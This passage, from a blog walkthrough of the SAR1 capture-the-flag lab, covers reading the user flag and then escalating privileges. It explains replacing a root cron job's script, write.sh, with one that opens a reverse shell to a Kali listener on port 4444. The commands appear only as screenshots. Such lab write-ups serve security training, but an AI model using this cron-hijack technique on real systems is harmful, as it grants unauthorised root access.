left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhkV9lmf2qTZOQVzn88takZiebLhSOsmtlMytNBm3BtY-CMbyUtSPAfcYcYK-RNLjqlk7mmFzMpJfneQdBvBYDgW7QO-K1j_iBKYIlB0zUnocVbdXoYMa5m-IE43558PxGhE8I-eQKug_0g9imt8-n4pW71LHCHjTO-fAoP5xK8A7nnePvLwTPC4Zbkwg=s592&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;127&quot; data-original-width=&quot;592&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhkV9lmf2qTZOQVzn88takZiebLhSOsmtlMytNBm3BtY-CMbyUtSPAfcYcYK-RNLjqlk7mmFzMpJfneQdBvBYDgW7QO-K1j_iBKYIlB0zUnocVbdXoYMa5m-IE43558PxGhE8I-eQKug_0g9imt8-n4pW71LHCHjTO-fAoP5xK8A7nnePvLwTPC4Zbkwg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;- Looking for content:&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhJ2vtfkwMeq3BynmMBZ5RJFz30ZZFBBcxwNhilG2JGcSNOb5zEeueM0GThwDTvpOPeeMs4qUNa3fsK7fUSwTXFCCAS-GomoclLEWBEvKFM3_G0n8cU9TesPKE4dVtcXGsG45PdmswdW9eMbEUkiIgh7dGLRAiRDvUxjcATXNfUT5ZYNVHkj__n2qoh-w=s375&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;125&quot; data-original-width=&quot;375&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhJ2vtfkwMeq3BynmMBZ5RJFz30ZZFBBcxwNhilG2JGcSNOb5zEeueM0GThwDTvpOPeeMs4qUNa3fsK7fUSwTXFCCAS-GomoclLEWBEvKFM3_G0n8cU9TesPKE4dVtcXGsG45PdmswdW9eMbEUkiIgh7dGLRAiRDvUxjcATXNfUT5ZYNVHkj__n2qoh-w=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhrKy2BirEIXj1pLi9reIhXFvcDUj42S0hUjz0fMoMYDbzEYaEXtgdZvIYnGQ6xtlykHkPUVMwVR-NbhbR68lC_T2bq3XOHaZUwl-zCx-xo1RLlTVp9mvsv1-ZRyaJzMRrBFmm33iqj9yGff6XS16oGiVGksYUHHhS_VWaAjEqXpudtc8stqXnPUpFeCQ=s765&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;623&quot; data-original-width=&quot;765&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhrKy2BirEIXj1pLi9reIhXFvcDUj42S0hUjz0fMoMYDbzEYaEXtgdZvIYnGQ6xtlykHkPUVMwVR-NbhbR68lC_T2bq3XOHaZUwl-zCx-xo1RLlTVp9mvsv1-ZRyaJzMRrBFmm33iqj9yGff6XS16oGiVGksYUHHhS_VWaAjEqXpudtc8stqXnPUpFeCQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;4 - CAPTURING THE 1st FLAG&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading &lt;b&gt;user.txt&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj98PZwNsm__m1ZUfRiAHKR80e7h0ccsDYyCoKNtZR80J_-J8f1Ceijltc2hHFNzI3P8unX_eLPZrPE4gpHrAfskN6S4zKHc5WODGMSnfwaqBH4hPY7EWANPtYmo9I1MHruQgvLl_97Y1DiOoGZ2iRJdWTvEOEUMO072oaVuZV41ztBTSyblWOA3TTsJQ=s578&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;252&quot; data-original-width=&quot;578&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj98PZwNsm__m1ZUfRiAHKR80e7h0ccsDYyCoKNtZR80J_-J8f1Ceijltc2hHFNzI3P8unX_eLPZrPE4gpHrAfskN6S4zKHc5WODGMSnfwaqBH4hPY7EWANPtYmo9I1MHruQgvLl_97Y1DiOoGZ2iRJdWTvEOEUMO072oaVuZV41ztBTSyblWOA3TTsJQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc;&quot;&gt;5 - PRIVILEGE ESCALATION&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;- As expected, access to root folder is not allowed, so we need Privilege Escalation:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjW_q1GPFSX4PCcTbBDO-uDDdRzWpr-1mT4AArI73HLouvdpp6JT4A8gJIOpqOHsOJBA4NppIybW5sY_iFt2XRGFaw8msvfyIB59Z5QEhxVv--inGUHNikm3XSiDHjtkUsvzmJ4Zluv2e_hpj4U2taD_K6i8DjxazywOwqdPGJRKd9Fwc1w-ZUozoYapw=s401&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;70&quot; data-original-width=&quot;401&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjW_q1GPFSX4PCcTbBDO-uDDdRzWpr-1mT4AArI73HLouvdpp6JT4A8gJIOpqOHsOJBA4NppIybW5sY_iFt2XRGFaw8msvfyIB59Z5QEhxVv--inGUHNikm3XSiDHjtkUsvzmJ4Zluv2e_hpj4U2taD_K6i8DjxazywOwqdPGJRKd9Fwc1w-ZUozoYapw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Looking for &lt;b&gt;cron &lt;/b&gt;jobs, we find that the script &lt;b&gt;finally.sh&lt;/b&gt; is run every 5 minutes:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEialXZNao28vkz5vwCBpDSLxzSeg5_LksD0tXc3WWyYpo4pmOaiUilUqqGkZV6LRhDV0ayn8thjNlAqwOEa_tVRhN4Wgifc7TqtDduQIpHsPRJKBoaPz90WzrIL2kiBNjz2kNTnTJ3ZMNpTpPosUGNoNBYVv_NDWMykv5TW1RVnij4mzzpKfatDGmFgJQ=s755&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;424&quot; data-original-width=&quot;755&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEialXZNao28vkz5vwCBpDSLxzSeg5_LksD0tXc3WWyYpo4pmOaiUilUqqGkZV6LRhDV0ayn8thjNlAqwOEa_tVRhN4Wgifc7TqtDduQIpHsPRJKBoaPz90WzrIL2kiBNjz2kNTnTJ3ZMNpTpPosUGNoNBYVv_NDWMykv5TW1RVnij4mzzpKfatDGmFgJQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;-&lt;b&gt; finally.sh&lt;/b&gt; executes &lt;b&gt;write.sh&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg94DHQdeDkcMVwMV4ZNEVCkYVNQUlybsWz2aPi56cIDtk8eaeq0wU3X4raTpzwKwys7BtliJU_StYs0IiiQ9IKlSM4waCeHewki_W_lcx1n9a3J5xs2xQ189b4ocbwO4nLk7E6kmw9nQa8_h1X4cSK3P5fxm9j_V1avLlNad51d_reDfTXsfexUpG5XQ=s491&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;233&quot; data-original-width=&quot;491&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg94DHQdeDkcMVwMV4ZNEVCkYVNQUlybsWz2aPi56cIDtk8eaeq0wU3X4raTpzwKwys7BtliJU_StYs0IiiQ9IKlSM4waCeHewki_W_lcx1n9a3J5xs2xQ189b4ocbwO4nLk7E6kmw9nQa8_h1X4cSK3P5fxm9j_V1avLlNad51d_reDfTXsfexUpG5XQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Script&amp;nbsp;&lt;b&gt;finally.sh&lt;/b&gt;&amp;nbsp;is&amp;nbsp;run with root privileges:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjFfm4a27cJqyZodvquUUpXr9axQ9IH4gQay1hvOZPgrKAcrAWOqxvSB8KYeA0HtFTrZQzZq7-jDVow-pmCMZQsQQQ-irlKZa0SWkC97Kl21ntvklLbPCEMLaMTqklc33YcLL4Qj5Zh5ZR13aG1FEaNDvTXHE8FonvyPIpnjUorwZRtZC7pwAKC7hz0EA=s686&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;252&quot; data-original-width=&quot;686&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjFfm4a27cJqyZodvquUUpXr9axQ9IH4gQay1hvOZPgrKAcrAWOqxvSB8KYeA0HtFTrZQzZq7-jDVow-pmCMZQsQQQ-irlKZa0SWkC97Kl21ntvklLbPCEMLaMTqklc33YcLL4Qj5Zh5ZR13aG1FEaNDvTXHE8FonvyPIpnjUorwZRtZC7pwAKC7hz0EA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgomXMQWJzG7vrcQZyGsow4XoS7UJsQA8EL3YsfodwkHpPxFcwKJjt7_CFrBFlAN0WjzRcOy15M0vn7nK1jmJiE5YzNPYCSsylM_om42OeOTON53B1P-57Em0VsieNuZ5k9_DQ-XqKibz9vwhKO3byxqDZvOtDe5Di3l5zN9AeEJASFMqd13w8dNhxytw=s700&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;253&quot; data-original-width=&quot;700&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgomXMQWJzG7vrcQZyGsow4XoS7UJsQA8EL3YsfodwkHpPxFcwKJjt7_CFrBFlAN0WjzRcOy15M0vn7nK1jmJiE5YzNPYCSsylM_om42OeOTON53B1P-57Em0VsieNuZ5k9_DQ-XqKibz9vwhKO3byxqDZvOtDe5Di3l5zN9AeEJASFMqd13w8dNhxytw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- The strategy for Privilege Escalation will be to remove current&amp;nbsp;&lt;b&gt;write.sh&lt;/b&gt; and create a new one that will open a reverse shell connection.&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Removing &lt;b&gt;write.sh&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj2M2t5VVlWF94jiADu_KiKwiWKTlfHi5MVFsUCLiCS38kgyduNg8hLVlFPKfQk0glHBcDuSFJi6p0WW0d6EDimilKvHiSM5yOvoNhp14if5U8kt3B1lnZvA9Exc2Qk4RBi5Dewo1RaaypM2E7YTQhzU9rav_MEW3lSmNDDjXGpdMzlvkg-Zg7Zgl-s6w=s443&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;45&quot; data-original-width=&quot;443&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj2M2t5VVlWF94jiADu_KiKwiWKTlfHi5MVFsUCLiCS38kgyduNg8hLVlFPKfQk0glHBcDuSFJi6p0WW0d6EDimilKvHiSM5yOvoNhp14if5U8kt3B1lnZvA9Exc2Qk4RBi5Dewo1RaaypM2E7YTQhzU9rav_MEW3lSmNDDjXGpdMzlvkg-Zg7Zgl-s6w=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;- Writing a new script &lt;/span&gt;&lt;b style=&quot;font-family: arial; font-size: large;&quot;&gt;write.sh&lt;/b&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjC1s8tzKsCn-biEQ6clBQ1dWFTXX2P6MmavSAPh2JlStbGH2tLriw5FAf5wbafSRZttK9tn_zeSJMylU5I0mVCNJdmLe7ty94M04GLfWsYNueLvdTNTqDKtsdxGUoZkMEGX55hn6o79dIRxWzdqeAHTpjI0uWiQjPj0ROOQFjQn7zsBfkrDAcEH3S5Vw=s475&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;90&quot; data-original-width=&quot;475&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjC1s8tzKsCn-biEQ6clBQ1dWFTXX2P6MmavSAPh2JlStbGH2tLriw5FAf5wbafSRZttK9tn_zeSJMylU5I0mVCNJdmLe7ty94M04GLfWsYNueLvdTNTqDKtsdxGUoZkMEGX55hn6o79dIRxWzdqeAHTpjI0uWiQjPj0ROOQFjQn7zsBfkrDAcEH3S5Vw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;- Transferring the new script from Kali to SAR1:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiZES2KHf-5ruI2SSKAH_IoEsNSvQIzceLudxZzqJNzqEmtr67zkKSkhGXWsLcE7ECrNwWmagY6dZs_Sk5xbclfG9fFa2Ewycg8Dtr9PqWOj4JRJbDjIZeqZE-1q3elOGazFleR9JNVvabRBRL-FBZSa43sov_gHL7OmuX4c-RUtqoTV2Kbdlzb-5CNFw=s446&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;71&quot; data-original-width=&quot;446&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiZES2KHf-5ruI2SSKAH_IoEsNSvQIzceLudxZzqJNzqEmtr67zkKSkhGXWsLcE7ECrNwWmagY6dZs_Sk5xbclfG9fFa2Ewycg8Dtr9PqWOj4JRJbDjIZeqZE-1q3elOGazFleR9JNVvabRBRL-FBZSa43sov_gHL7OmuX4c-RUtqoTV2Kbdlzb-5CNFw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjfBVTnVM9sezquOoMEMhb3_jxc7lVlK6t2ScB9KgQTrB_tElwLf9-chS9CVMkmk-FIhUDxORqLaIuOxsqx08L_Aic4iJz9p6OJGKiB13dl-nsNf6bdYpiTBRd48MJP_mdIJQx2eWjID9zdbXO8scOc0ZczB_uVk9lIzsxak6bsH0EvVxzGO8c5uDB0Tw=s839&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;414&quot; data-original-width=&quot;839&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjfBVTnVM9sezquOoMEMhb3_jxc7lVlK6t2ScB9KgQTrB_tElwLf9-chS9CVMkmk-FIhUDxORqLaIuOxsqx08L_Aic4iJz9p6OJGKiB13dl-nsNf6bdYpiTBRd48MJP_mdIJQx2eWjID9zdbXO8scOc0ZczB_uVk9lIzsxak6bsH0EvVxzGO8c5uDB0Tw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Opening a listening session at Kali port 4444:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEilqSpTLCnMZ2-33plnnuZjUt9hCLeri8Y_FSxgC5TDQYjUZyWVDkgR0xzft9D59D-m7rXml4GMUqQ5xEVPbse7eqcvb_dt0k0PYWis7WPhpXOOrEta_ae51-OvyVwL4R3h1xBYdWcBiH98ETuGBGw9wZbAcVL7fhO5s97U0do70X1LqHUWEX7CK5OUZw=s318&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;78&quot; data-original-width=&quot;318&quot; height=&quot;78&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEilqSpTLCnMZ2-33plnnuZjUt9hCLeri8Y_FSxgC5TDQYjUZyWVDkgR0xzft9D59D-m7rXml4GMUqQ5xEVPbse7eqcvb_dt0k0PYWis7WPhpXOOrEta_ae51-OvyVwL4R3h1xBYdWcBiH98ETuGBGw9wZbAcVL7fhO5s97U0do70X1LqHUWEX7CK5OUZw&quot; width=&quot;318&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- As a consequence of &lt;b&gt;write.sh&lt;/b&gt; being run as part of the &lt;b&gt;cron&lt;/b&gt; job &lt;b&gt;finally.sh&lt;/b&gt;, after some minutes a &lt;b&gt;reverse root 